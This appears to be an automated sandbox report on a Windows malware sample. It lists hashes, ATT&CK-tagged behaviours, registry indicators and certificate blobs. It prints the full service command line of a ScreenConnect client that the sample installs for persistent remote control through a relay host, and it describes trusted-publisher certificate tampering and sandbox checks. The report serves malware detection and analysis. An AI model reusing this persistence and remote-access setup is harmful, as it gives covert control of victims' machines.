dfa6a6ffe5fa53daddf2403ba5cb9a3c2d99a31463da7edeebb6e9c28af82802

Analysis

max time kernel
85s
max time network
148s
platform
windows10-2004_x64
resource
win10v2004-20231222-en
resource tags

arch:x64arch:x86image:win10v2004-20231222-enlocale:en-usos:windows10-2004-x64system
submitted
12/02/2024, 05:09

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

fd9c7a95284cee5e0145b8255e04a8af.exe
Size

84KB
MD5

fd9c7a95284cee5e0145b8255e04a8af
SHA1

70c830fa72a3ac444cfb48feb1e763363f00899e
SHA256

dfa6a6ffe5fa53daddf2403ba5cb9a3c2d99a31463da7edeebb6e9c28af82802
SHA512

0d2e3f869f6828dbe7dbc09e4c468483c9a5bd087bae38bfc7a2723545aaa87bf726c84a20618235b2e21c83074e7a4c403927f78dce40bd394c57dfaf1d1ae3
SSDEEP

1536:7azWlKzJVcNp++yQNS6xNNCT2l8NE8llbpTaCJRpsWr6cdaQTJSvYYm78Rxvp:JFNpo6rIKlUE8fbkqRfbaQlaYYmI

Score

8^/10

persistence

Malware Config

Signatures

Downloads MZ/PE file

Manipulates Digital Signatures 1 TTPs 4 IoCs

Attackers can apply techniques such as changing the registry keys of authenticode & Cryptography to obtain their binary as valid.

SIP and Trust Provider Hijacking

T1553.003

description	ioc	Process
Set value (data)	\REGISTRY\USER\S-1-5-21-1168293393-3419776239-306423207-1000\SOFTWARE\Microsoft\SystemCertificates\TrustedPublisher\Certificates\7B0F360B775F76C94A12CA48445AA2D2A875701C\Blob = 0300000001000000140000007b0f360b775f76c94a12ca48445aa2d2a875701c2000000001000000b4060000308206b030820498a003020102021008ad40b260d29c4c9f5ecda9bd93aed9300d06092a864886f70d01010c05003062310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3121301f060355040313184469676943657274205472757374656420526f6f74204734301e170d3231303432393030303030305a170d3336303432383233353935395a3069310b300906035504061302555331173015060355040a130e44696769436572742c20496e632e3141303f060355040313384469676943657274205472757374656420473420436f6465205369676e696e6720525341343039362053484133383420323032312043413130820222300d06092a864886f70d01010105000382020f003082020a0282020100d5b42f42d028ad78b75dd539591bb18842f5338ceb3d819770c5bbc48526309fa48e68d85cf5eb342407e14b4fd37843f417d71edaf9d2d5671a524f0ea157fc8899c191cc81033e4d702464b38de2087d347d4c8057126b439a99f2c53b1ff2efcb475a13a64cb3012025f310d38bb2fb08f08ae09d09c065a7fa98804935873d5119e8902178452ea19f2ce118c21accc5ee93497042328ffbc6ea1cf3656891a24d4c8211485268de10bd14575de8181365c57fb24f852c48a4568435d6f92e9caa0015d137fe1a0694c27cc8ea1b32e6cac2f4a7a3030e74a5af39b6ab6012e3e8d6b9f731e1dcade418a0d8c1234747b3a10f6ea3ab6d9806831bb76a672dd2bd441a9210818fb03b09d7c79b325ac2ff6a60548b49c193ede1b45ce06feb26f98cd5b2f93810e6eace91f5bed3fb6f9361345cbc93452883362a66285fb073ce8b262506b283d45cf615194ced62e05e33f2e8e8ec0aa7b0032b91b23679bef7ad081e75a665ccbbe34850f377911afedb50a246c8615898f57c02163c8328ad3986ecd4b70d53d0f847e675308dec30937614a65b4b5d74614d3f129176debf58cb72102941f0d5c56d267668114113589adc262b01f4894d59db78cf814a3e40475fc98150738510232159608a6454c1cc211ae838197c661ccd78384530994fff634f4cbbaa0d0853417c583d47b3fab6ec8c320902cc6c3c0c56110203010001a38201593082015530120603551d130101ff040830060101ff020100301d0603551d0e041604146837e0ebb63bf85f1186fbfe617b088865f44e42301f0603551d23041830168014ecd7e382d2715d644cdf2e673fe7ba98ae1c0f4f300e0603551d0f0101ff04040302018630130603551d25040c300a06082b06010505070303307706082b06010505070101046b3069302406082b060105050730018618687474703a2f2f6f6373702e64696769636572742e636f6d304106082b060105050730028635687474703a2f2f636163657274732e64696769636572742e636f6d2f446967694365727454727573746564526f6f7447342e63727430430603551d1f043c303a3038a036a0348632687474703a2f2f63726c332e64696769636572742e636f6d2f446967694365727454727573746564526f6f7447342e63726c301c0603551d20041530133007060567810c01033008060667810c010401300d06092a864886f70d01010c050003820201003a23443d8d0876ee8fbc3a99d356e0021aa5f84834f32cb6e67466f79472b100caaf6c302713129e90449f4bfd9ea37c26d537bc3a5d486d95d53f49f427bb16814550fd9cbdb685e0767e3771cb22f75aaa90cff5936ae3eb20d1d55079889a8a8ac1b6bda148187edcd8801a111918cd61998156f6c9e376e7c4e41b5f43f83e94ff76393d9ed499cf4add28eb5f26a1955848d51afed7273ffd90d17686dd1cb0605cf30da8eee089a1bd39e1384eda6ebb369dfbe521535ac3cae96af1a23edb43b833c84f38149299f5ddce546dd95d02141f40337c03e295b2c221757352cb46d8c4341ca2a54b8dcd6f76372c853f1ace26e918be9007b0437f9588208270f0cccaeffd29355c1f893855f7378a8b09a1cb0be9311aff2e195c3971e1be9ca70a06d62667b792e64e5fde7aac49cf2ea47492addb3ca49c861fe3c1561b2b23ff8fb5ea887b706be6a0bafd3a3f45a6c4e81691528b41c048844b964dab4440e38df01528ceedf11856072a2f10c40c08643c338fae288c3ccb8f880b0dbf3bf4ce1e7b8eefb5ebcbb7f07713e6e7283fac12aea52f226c41f9825c1566cc6c0ecac586c3f626330c074ba0d307026a6a4030484b34a85120bbad1b8508e2590d6dca05502bea4a1c9ea5fda0a71f0674e7f2d65290fdaf854821f9573bb49c03ed8645f4b4616ebf68e2266086eac8afa9fe941de7631b3a8656784e	fd9c7a95284cee5e0145b8255e04a8af.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-1168293393-3419776239-306423207-1000\SOFTWARE\Microsoft\SystemCertificates\TrustedPublisher\Certificates\4C2272FBA7A7380F55E2A424E9E624AEE1C14579\Blob = 0300000001000000140000004c2272fba7a7380f55e2a424e9e624aee1c145792000000001000000640700003082076030820548a00302010202100b9360051bccf66642998998d5ba97ce300d06092a864886f70d01010b05003069310b300906035504061302555331173015060355040a130e44696769436572742c20496e632e3141303f060355040313384469676943657274205472757374656420473420436f6465205369676e696e67205253413430393620534841333834203230323120434131301e170d3232303831373030303030305a170d3235303831353233353935395a3065310b30090603550406130255533110300e06035504081307466c6f72696461310e300c0603550407130554616d706131193017060355040a1310436f6e6e656374776973652c204c4c433119301706035504031310436f6e6e656374776973652c204c4c4330820222300d06092a864886f70d01010105000382020f003082020a0282020100ec489826d08d2c6de21b3cd3676db1e0e50cb1ff75ff564e9741f9574aa3640aa8297294a05b4db68abd0760b6b05b50ce92ff42a4e390be776a43e9961c722f6b3a4d5c880bcc6a61b4026f9137d36b2b7e9b86055876b9fa860dbcb164fe7f4b5b9de4799ae4e02dc1f0bee01e5d032933a2827388f8db0b482e76c441b1bd50909ef2023e1fb62196c994ce052266b28cd89253e6416044133139764db5fc45702529536bf82c775f9ec81fa27dc409530325f40cdef95b81b9ce0d42791cee72e7bd1b36c257b52257c65a28970e457513989434bfc239e2992b193e1b3cc3f11ccdd1d26d4ec9845099ab913906a42069af999c0071169b45a2ea1aa666f1904e8acb05e1823a359a291fd46b4ef7aed5935bb6ab17ebf077210726930c90f01761d6544a94e8fa614cc41d817eec734b1c3d3afb7c58fb256f0c09edc1459bddbff9940ed1958570265d67af79a9b6a16affd70fc6328c9810d5dc186e39af6fbcad49a270f237e6bcd5de0bc014bc3179cd79776591340311a42ca94f33416c2e01b59bd1d71de86ace6716bc90b2d7695d155039aa08fbac19a4d93fb784230a20a485287a16355645fc09142c602d140fa046b7bfd75328184ff7bdf8f9e0d65e6201c8d242931047f59bd328ac353777ccefa60408887b84fc3631301463461a1d73c0b5cc74d6d82905ddf923bdbab027a311cc38d3fa16f639a50203010001a382020630820202301f0603551d230418301680146837e0ebb63bf85f1186fbfe617b088865f44e42301d0603551d0e04160414338ce10a6e06d9c6ed0bc6cae736cefb8188646a300e0603551d0f0101ff04040302078030130603551d25040c300a06082b060105050703033081b50603551d1f0481ad3081aa3053a051a04f864d687474703a2f2f63726c332e64696769636572742e636f6d2f4469676943657274547275737465644734436f64655369676e696e6752534134303936534841333834323032314341312e63726c3053a051a04f864d687474703a2f2f63726c342e64696769636572742e636f6d2f4469676943657274547275737465644734436f64655369676e696e6752534134303936534841333834323032314341312e63726c303e0603551d20043730353033060667810c0104013029302706082b06010505070201161b687474703a2f2f7777772e64696769636572742e636f6d2f43505330819406082b06010505070101048187308184302406082b060105050730018618687474703a2f2f6f6373702e64696769636572742e636f6d305c06082b060105050730028650687474703a2f2f636163657274732e64696769636572742e636f6d2f4469676943657274547275737465644734436f64655369676e696e6752534134303936534841333834323032314341312e637274300c0603551d130101ff04023000300d06092a864886f70d01010b050003820201000ad79f00cf4984864c8981ecce8718aa875647f6a74608c968e16568c7aa9d711ed7341676038067f01330c91621b27a2a8894c4108c268162a31f13f9757a7d6bb3c6f19bf27c3a29896d712d85873627d827cd6471761444fabf1d31e903f791143c5b4ce5e7444aacba36d759aeba3069d195226755cbc675aa747f77596c53c96e083c45bba24479d6845eea9f2b28ba29b4dcf0bcf14aa4ce176c24e2c1b8fec3ee16e1c086db6fda97388859e83be65c03f701395b78b842c6dd1533ef642cca6fe50f6337d3f2dfedd8b28f2b28e0c98edd2151392e7cc75489f48859f1de14c81b306eb50eed7bb78be30eaada76767c4ca523a11eec5a2372d6122926ab1801a6a6778e9504791487ee47d4577154988802070f80fc535957658f954cd083546c5afb5a6567b6761275f5db20f70ab86feef94c7cfc65369d325121b69a82399bc7dc1962416f0f05cf1eee64d495a3527e464e2c68da0187093f97b673e43dddbcc067e00713f1565fcff8c3772d44b40a04e600644f22a990345f9a6b5b52963e82c81a0ce91d43a230f67b37d8debda40ea3d59d305e18adc1976516c12a8ba2bca24143b12e9527b4dca58872aa9b3a8c6ac563fc2dc02bf51be889516d35a4ba9d062417b5bdcc50ba945fae26b60d6aec03984798a6a21d3ff793cc0849e81ed55b8027411c50db776ae8feef2fdc2dafb04345261dedc054	fd9c7a95284cee5e0145b8255e04a8af.exe
Key deleted	\REGISTRY\USER\S-1-5-21-1168293393-3419776239-306423207-1000\SOFTWARE\Microsoft\SystemCertificates\TrustedPublisher\Certificates\7B0F360B775F76C94A12CA48445AA2D2A875701C	fd9c7a95284cee5e0145b8255e04a8af.exe
Key deleted	\REGISTRY\USER\S-1-5-21-1168293393-3419776239-306423207-1000\SOFTWARE\Microsoft\SystemCertificates\TrustedPublisher\Certificates\4C2272FBA7A7380F55E2A424E9E624AEE1C14579	fd9c7a95284cee5e0145b8255e04a8af.exe

Sets service image path in registry 2 TTPs 1 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\ScreenConnect Client (3dfe980f-b80c-4b62-945f-6bac5d0b481d)\ImagePath = "\"C:\\Users\\Admin\\AppData\\Local\\Apps\\2.0\\L2TD238H.1QB\\Z27WK58J.VTC\\scre..tion_25b0fbb6ef7eb094_0017.0008_3bd723dddab2064c\\ScreenConnect.ClientService.exe\" \"?e=Support&y=Guest&h=instance-yp0dwd-relay.screenconnect.com&p=443&s=3dfe980f-b80c-4b62-945f-6bac5d0b481d&k=BgIAAACkAABSU0ExAAgAAAEAAQC5GvbvcZAxIpD9TgcZwBfMfBxwQcJXJq7riox3Anold6J1P35iiqPjMDsbijlKCx5INOyiK6NmNmeSgaSzG320lHwXxuq4DjEotVaevAfY974RZb3WSLkwhwCp1ajm48bYTByPIdNvzESe7rTNSjg%2b8BoPZ2zwKtQwvzoRoTxfMKJjijYmvqFM3XGJ5%2bxQOOBkAuUqyhoIkesPDtUJBNTeLdnzm3UL3da6dDMfOwQzybXA9s5MMf8x5NEUK6xoggkgFEjWieQ%2fk4WYeDYwwIhCDPfcRt3rQt4bckvMp%2fjVdkp%2fNQEfihtgRR%2bEKR8QevihYFK%2bLKxeMmmZc6TjKPDa&v=AQAAANCMnd8BFdERjHoAwE%2fCl%2bsBAAAAwLHCKopE0k6LNfckauOUOQAAAAACAAAAAAAQZgAAAAEAACAAAABXvyhYJ%2fEP2ACmXa0ejL2aIAmBF%2b%2bcrUwnZZxWlZpxAgAAAAAOgAAAAAIAACAAAACB4%2b4XB7kc442upn6hJJudU4R3Qj5q%2fU5fTXew1bFVbqAEAACHt0rfkIEQdE%2bwja9hEXmcDCQYtD7XHx%2feX26mfZfCpNiQcPsMuS6c99rBAK0dnA2pTjCZzk%2fXrBiO6kscswbJBP%2f1AnBY1jSZnW5yUOuYkGrBO7SYy%2bZdBbiY9VyPYIk9InLtoQIXd7WkY%2fmbxMVyKr5lHfaHYCL38U25rAbk5zJrnp%2fIfRLscexn7k1cWE0Rol3%2faxnWfi4kPN%2fU0dYuqq90V4FXVz%2b9yrjaIdFcbcCihx4MbrZbTXAsLNWsyS5h6AkQ20AiTJvxu1jUsEhfy6xIgq51QFgisL1UR%2bR0bB1XfjOqnuh0VmwlR6XASyfKRLfIo1TW3B%2fDklr2s%2bvTpAZHGMFQmXZwRYuD6UblUvpdr%2b3eLN7eaL2ai%2btVRGmfAyKVIUt42lYgAS1KAVALAYQp6xJ4bhMh6jy%2fPGrHgzaXGLI10NP%2b0CdtsmNYAH5%2bBppqdPPah6vlHo99Xt3zqCsCDpL3h%2fzCUZ6kzRfYgOh8CgDE2mHjb0Dv554jOCgSFl%2fwlBB0it%2brA4xlv4eJmRMb%2blbkVBCd1o5xpIk1EOGFqKVhfwz9%2bp2bgvklWdQLAilyIdQS%2b4OqIFdR62ZooGz1qI1rQ%2bJ4rEvZ%2fwH%2bvHCsyKFuUqU5wn0nBkAlcNPLe4wuVtQw18xsCcRHD56T7LoovxZ0%2fU3TOGqvvTeGwGlLRyp2%2flk247rdEPWl9bzvviPDUCvgfOO%2bNpbUoeAOnwUY893WeSEaDc5bAzolZulcPAd86JlLYKX7ORR2BjI3ydslM1zeQcB7r2efRXtSFfT7SLS1hvfG0qpXTCeX%2b5nk1YriUkxzKhmC0v%2beDjV38KoDwP9vwm7pAQdg0ry8WRd5NI9ASXXK4gllafHjix4KDtYUMTudguqQrdFTOAfrS6dz0i0sOHEXmGIrdo2F8UMHxWayBchvRG5eAOV33zLrltKyCXERrsHNo6iHYkGY%2bNgGR8yEtxKZ9SbUd%2fOs7pVLvKq5b06N7DpRWbeBRj2X8I52EZFL5X3PTJq%2bMR2yeBIjIP66EWSlo87zBmY5%2f0e01MZsOrRzX9Uf%2bDTH5VwgTItJ6x3fG15A4H2S5pLlQ3bPa6npqxGMTe9TvAiyOwdPC5zcoY49h7zVPbrLk5hHKV8pVNiBKo%2f46oJGEz1lXBB5eGLjcZot2UXvt5BQKGm%2bFKTM41%2fWkRdUQBJ6ODC6QoDoQBDphIh9qGU8F7xBkp5lIPkvVpY8ErS0mx3nzF05Pj4yU6U5IjQ7zd0sTisA9VKoMw8%2ffhTFa9faQyoYNOjoKLCQ%2fVWGLCOhHow14WMs61tQ%2f6tNEdCW1Hb8TjRJiX1MU7MUTjE17bJ52UWUurv5%2bWFj06kRelNGAqA%2bsuKbFGq%2fQj6cwOrAIcymmdX69wdPSlZSIDdZeBs51fZ6p4lViklTWfXUt2v1OY9H6WnfY1VZoWnlFqcd7HYuQmUfCRKUZ7zrMOv9wfCQRgGsOIWkhQZ%2bMuBCTP687rN2iE2UxmrZoQZJGQzYV7eAN2BMbIFqCP%2bVs0XNLD4C4KLqc6iHW232X4F4thrwfnaL0K%2fL0UbfjO%2f6t0mKKlS%2fNUAAAADMQyU6AYDGueKcogbhK6Xo4z1a2A%2fFxWR7eR6BOMUJSqarHMP0ZLk1HV47T4jl%2f5GiId2DxxfTgzSLxlf%2f%2faAN&r=&i=Untitled%20Session\" \"1\""	ScreenConnect.ClientService.exe

Executes dropped EXE 5 IoCs

pid	Process
2272	ScreenConnect.WindowsClient.exe
4276	ScreenConnect.ClientService.exe
4624	ScreenConnect.ClientService.exe
2004	ScreenConnect.WindowsClient.exe
3236	ScreenConnect.WindowsClient.exe

Loads dropped DLL 16 IoCs

pid	Process
4276	ScreenConnect.ClientService.exe
4276	ScreenConnect.ClientService.exe
4276	ScreenConnect.ClientService.exe
4276	ScreenConnect.ClientService.exe
4276	ScreenConnect.ClientService.exe
4276	ScreenConnect.ClientService.exe
4624	ScreenConnect.ClientService.exe
4624	ScreenConnect.ClientService.exe
4624	ScreenConnect.ClientService.exe
4624	ScreenConnect.ClientService.exe
4624	ScreenConnect.ClientService.exe
4624	ScreenConnect.ClientService.exe
4624	ScreenConnect.ClientService.exe
4624	ScreenConnect.ClientService.exe
4624	ScreenConnect.ClientService.exe
4624	ScreenConnect.ClientService.exe

Drops file in System32 directory 3 IoCs

description	ioc	Process
File created	C:\Windows\system32\user.config	ScreenConnect.WindowsClient.exe
File opened for modification	C:\Windows\system32\user.config	ScreenConnect.WindowsClient.exe
File created	C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\ScreenConnect.WindowsClient.exe.log	ScreenConnect.WindowsClient.exe

Checks processor information in registry 2 TTPs 2 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	ScreenConnect.WindowsClient.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	ScreenConnect.WindowsClient.exe

Modifies data under HKEY_USERS 10 IoCs

description	ioc	Process
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1"	ScreenConnect.WindowsClient.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\	ScreenConnect.ClientService.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1"	ScreenConnect.ClientService.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1"	ScreenConnect.ClientService.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0"	ScreenConnect.ClientService.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\	ScreenConnect.WindowsClient.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1"	ScreenConnect.WindowsClient.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1"	ScreenConnect.ClientService.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1"	ScreenConnect.WindowsClient.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0"	ScreenConnect.WindowsClient.exe

Modifies registry class 64 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-1168293393-3419776239-306423207-1000_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Marks\scre..vice_4b14c015c87c1ad8_0017.0008_none_168ad7f16bd0ec27	dfsvc.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-1168293393-3419776239-306423207-1000_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Components\scre...exe_25b0fbb6ef7eb094_0017.0008_none_a9cdde1d1a468748\Files\ScreenConnect.ClientService.exe_e781b1ee36 = 01	dfsvc.exe
Key created	\REGISTRY\USER\S-1-5-21-1168293393-3419776239-306423207-1000_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Components\scre..tion_25b0fbb6ef7eb094_0017.0008_3bd723dddab2064c	dfsvc.exe
Key created	\REGISTRY\USER\S-1-5-21-1168293393-3419776239-306423207-1000_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Components\scre..dows_4b14c015c87c1ad8_0017.0008_none_69af178a125f9bec	dfsvc.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-1168293393-3419776239-306423207-1000_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Components\scre..vice_4b14c015c87c1ad8_0017.0008_none_168ad7f16bd0ec27\DigestValue = e4f945e799d9bf5fc103f65d8ca832290b5ab03c	dfsvc.exe
Key created	\REGISTRY\USER\S-1-5-21-1168293393-3419776239-306423207-1000_Classes\Software\Microsoft	ScreenConnect.WindowsClient.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-1168293393-3419776239-306423207-1000_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\PackageMetadata\{2ec93463-b0c3-45e1-8364-327e96aea856}_{3f471841-eef2-47d6-89c0-d028f03a4ad5}\scre..tion_25b0fbb6ef7eb0 = 680074007400700073003a002f002f0074006500680069006800320038003700360038002e00730063007200650065006e0063006f006e006e006500630074002e0063006f006d002f00420069006e002f00530063007200650065006e0043006f006e006e006500630074002e0043006c00690065006e0074002e006d0061006e00690066006500730074000000	dfsvc.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-1168293393-3419776239-306423207-1000_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Marks\scre..dows_4b14c015c87c1ad8_0017.0008_none_69af178a125f9bec\implication!scre..tion_25b0fbb6ef7eb094_0017.0008_db3 = 68747470733a2f2f746568696832383736382e73637265656e636f6e6e6563742e636f6d2f42696e2f53637265656e436f6e6e6563742e436c69656e742e6170706c69636174696f6e2353637265656e436f6e6e6563742e57696e646f7773436c69656e742e6170706c69636174696f6e2c2056657273696f6e3d32332e382e352e383730372c2043756c747572653d6e65757472616c2c205075626c69634b6579546f6b656e3d323562306662623665663765623039342c2070726f636573736f724172636869746563747572653d6d73696c	dfsvc.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-1168293393-3419776239-306423207-1000_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Components\scre...exe_25b0fbb6ef7eb094_0017.0008_none_a9cdde1d1a468748\Transform = 01	dfsvc.exe
Key created	\REGISTRY\USER\S-1-5-21-1168293393-3419776239-306423207-1000_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Components\scre..ient_4b14c015c87c1ad8_0017.0008_none_c67e18ccbef56bc9	dfsvc.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-1168293393-3419776239-306423207-1000_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Components\scre..dows_4b14c015c87c1ad8_0017.0008_none_69af178a125f9bec\DigestValue = a1c063d652908b663a5e2d12c81c7a74b1f7b7e2	dfsvc.exe
Key created	\REGISTRY\USER\S-1-5-21-1168293393-3419776239-306423207-1000_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Components\scre..vice_4b14c015c87c1ad8_0017.0008_none_168ad7f16bd0ec27	dfsvc.exe
Key created	\REGISTRY\USER\S-1-5-21-1168293393-3419776239-306423207-1000_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\StateManager\Families	dfsvc.exe
Key created	\REGISTRY\USER\S-1-5-21-1168293393-3419776239-306423207-1000_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Marks\scre..tion_25b0fbb6ef7eb094_0017.0008_none_4ac217b380c5512b	dfsvc.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-1168293393-3419776239-306423207-1000_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Components\scre..ient_4b14c015c87c1ad8_0017.0008_none_c67e18ccbef56bc9\SizeOfStronglyNamedComponent = e116090000000000	dfsvc.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-1168293393-3419776239-306423207-1000_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Components\scre..core_4b14c015c87c1ad8_0017.0008_none_65373fa8d61188bc\DigestValue = 06cf299c7dc7867c9584647f5ba681aec6c469d4	dfsvc.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-1168293393-3419776239-306423207-1000_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\StateManager\Families\F_scre..tion_25b0fbb6ef7eb094_fca0185e7b0779c6\LastRunVersion = 68747470733a2f2f746568696832383736382e73637265656e636f6e6e6563742e636f6d2f42696e2f53637265656e436f6e6e6563742e436c69656e742e6170706c69636174696f6e2353637265656e436f6e6e6563742e57696e646f7773436c69656e742e6170706c69636174696f6e2c2056657273696f6e3d32332e382e352e383730372c2043756c747572653d6e65757472616c2c205075626c69634b6579546f6b656e3d323562306662623665663765623039342c2070726f636573736f724172636869746563747572653d6d73696c2f53637265656e436f6e6e6563742e57696e646f7773436c69656e742e6578652c2056657273696f6e3d32332e382e352e383730372c2043756c747572653d6e65757472616c2c205075626c69634b6579546f6b656e3d323562306662623665663765623039342c2070726f636573736f724172636869746563747572653d6d73696c2c20747970653d77696e3332	ScreenConnect.WindowsClient.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-1168293393-3419776239-306423207-1000_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Marks\scre..core_4b14c015c87c1ad8_0017.0008_none_65373fa8d61188bc\implication!scre..tion_25b0fbb6ef7eb094_0017.0008_db3 = 68747470733a2f2f746568696832383736382e73637265656e636f6e6e6563742e636f6d2f42696e2f53637265656e436f6e6e6563742e436c69656e742e6170706c69636174696f6e2353637265656e436f6e6e6563742e57696e646f7773436c69656e742e6170706c69636174696f6e2c2056657273696f6e3d32332e382e352e383730372c2043756c747572653d6e65757472616c2c205075626c69634b6579546f6b656e3d323562306662623665663765623039342c2070726f636573736f724172636869746563747572653d6d73696c	dfsvc.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-1168293393-3419776239-306423207-1000_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Components\scre...exe_25b0fbb6ef7eb094_0017.0008_none_a9cdde1d1a468748\Files\ScreenConnect.WindowsClient.exe.config_f7f = 01	dfsvc.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-1168293393-3419776239-306423207-1000_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Components\scre..dows_4b14c015c87c1ad8_0017.0008_none_69af178a125f9bec\Files\ScreenConnect.Windows.dll_fc0d83aff7df0b5b = 01	dfsvc.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-1168293393-3419776239-306423207-1000_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Components\scre..core_4b14c015c87c1ad8_0017.0008_none_65373fa8d61188bc\SizeOfStronglyNamedComponent = 3b2a080000000000	dfsvc.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-1168293393-3419776239-306423207-1000_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Marks\scre..ient_4b14c015c87c1ad8_0017.0008_none_c67e18ccbef56bc9\lock!0c0000003a61570ee00800008c0c00000000000000000000 = 30303030303865302c30316461356437316235366164316639	ScreenConnect.WindowsClient.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-1168293393-3419776239-306423207-1000_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\PackageMetadata\{2ec93463-b0c3-45e1-8364-327e96aea856}_{60051b8f-4f12-400a-8e50-dd05ebd438d1}\scre..tion_25b0fbb6ef7eb0 = 68747470733a2f2f746568696832383736382e73637265656e636f6e6e6563742e636f6d2f42696e2f53637265656e436f6e6e6563742e436c69656e742e6170706c69636174696f6e2353637265656e436f6e6e6563742e57696e646f7773436c69656e742e6170706c69636174696f6e2c2056657273696f6e3d32332e382e352e383730372c2043756c747572653d6e65757472616c2c205075626c69634b6579546f6b656e3d323562306662623665663765623039342c2070726f636573736f724172636869746563747572653d6d73696c	dfsvc.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-1168293393-3419776239-306423207-1000_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\PackageMetadata\{2ec93463-b0c3-45e1-8364-327e96aea856}_{60051b8f-4f12-400a-8e50-dd05ebd438d1}\scre..tion_25b0fbb6ef7eb0 = 3c004100700070006c00690063006100740069006f006e00540072007500730074002000760065007200730069006f006e003d002200310022000d000a00460075006c006c004e0061006d0065003d002200680074007400700073003a002f002f0074006500680069006800320038003700360038002e00730063007200650065006e0063006f006e006e006500630074002e0063006f006d002f00420069006e002f00530063007200650065006e0043006f006e006e006500630074002e0043006c00690065006e0074002e006100700070006c00690063006100740069006f006e002300530063007200650065006e0043006f006e006e006500630074002e00570069006e0064006f007700730043006c00690065006e0074002e006100700070006c00690063006100740069006f006e002c002000560065007200730069006f006e003d00320033002e0038002e0035002e0038003700300037002c002000430075006c0074007500720065003d006e00650075007400720061006c002c0020005000750062006c00690063004b006500790054006f006b0065006e003d0032003500620030006600620062003600650066003700650062003000390034002c002000700072006f0063006500730073006f0072004100720063006800690074006500630074007500720065003d006d00730069006c002f00530063007200650065006e0043006f006e006e006500630074002e00570069006e0064006f007700730043006c00690065006e0074002e006500780065002c002000560065007200730069006f006e003d00320033002e0038002e0035002e0038003700300037002c002000430075006c0074007500720065003d006e00650075007400720061006c002c0020005000750062006c00690063004b006500790054006f006b0065006e003d0032003500620030006600620062003600650066003700650062003000390034002c002000700072006f0063006500730073006f0072004100720063006